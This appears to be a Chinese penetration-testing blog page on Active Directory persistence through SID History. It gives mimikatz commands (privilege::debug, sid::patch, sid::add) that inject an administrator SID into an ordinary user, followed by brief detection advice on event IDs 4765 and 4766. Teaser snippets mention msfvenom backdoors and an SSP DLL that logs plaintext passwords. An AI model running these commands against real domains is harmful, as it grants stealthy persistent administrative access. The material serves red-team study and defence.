目錄 每個使用者都有自己的sid,sid的作用主要是跟蹤安全主體控制使用者連線資源時的訪問許可權,sid history是在域遷移過程中需要使用的乙個屬性。
如果a域中的域使用者遷移到b域中,那麼該使用者的sid值就會改變,進而其許可權也會改變。導致遷移後的使用者無法訪問以前可以訪問的資源。sid history的作用是在域遷移過程中保持域使用者的訪問許可權,如果遷移後使用者的sid值改變,系統會將原來的sid新增到遷移後使用者的sid history屬性中,使遷移後的使用者保持原有許可權、能夠訪問其原來可以訪問的資源。使用mimikatz可以將sid history屬性新增到任意使用者的sid history屬性中。在滲透測試中,如果獲得了域管理員許可權(或者等同於域管理員許可權),就可以將sid history作為實現持久化的方法。
使用域管理員許可權的 poweshell 檢視 tester 使用者的 sid history 屬性
import-module activedirectory
get-aduser tester -properties sidhistory
在域管理員許可權的命令列視窗開啟 mimikatz,將 administrator 的 sid 新增到惡意使用者 tester 的 sid history 屬性中
# 將高許可權的 sid history 屬性注入
privilege::debug
# 注入sid之前需要使用以下命令修復ntds服務,否則無法將高許可權的sid注人低許可權使用者的sid history屬性;
sid::patch
sid::add /sam:tester /new:administrator
# 檢視 tester 使用者的 sid history 屬性
get-aduser tester -properties sidhistory
# 清除惡意使用者的 sid history 屬性
經常檢視域使用者中sid為500的使用者。
完成域遷移工作後,對有相同sid history屬性的使用者進行檢查
定期檢查id為4765和4766的日誌。4765為將 sid histtory屬性新增到使用者的日誌。4766為將sid history屬性新增到使用者失敗的日誌。
許可權維持之 SID History 域控許可權維持
目錄 每個使用者都有自己的sid,sid的作用主要是跟蹤安全主體控制使用者連線資源時的訪問許可權,sid history是在域遷移過程中需要使用的乙個屬性。如果a域中的域使用者遷移到b域中,那麼該使用者的sid值就會改變,進而其許可權也會改變。導致遷移後的使用者無法訪問以前可以訪問的資源。sid h...
內網滲透 許可權維持 MSF
msf路徑 usr share 製作後門 msfvenom windows示例 遠控流程 2.開啟msf並進入handle模組 3.設定payload型別 必須與第一步一致 4.設定lhost和lport 與第一步生成的後門一致 5.options檢視配置是否正確 6.run執行 bg將程序放到後台...
域許可權維持 SSP密碼記錄
密碼記錄ssp security support provider 乙個用於身份驗證的 dll,系統在啟動時 ssp 會被載入到 lsass.exe 程序中,由於 lsa 可擴充套件,導致在系統啟動時我們可以載入乙個自定義的 dll,乙個用於記錄所有登入到當前系統的明文賬號密碼的 dll,利用mim...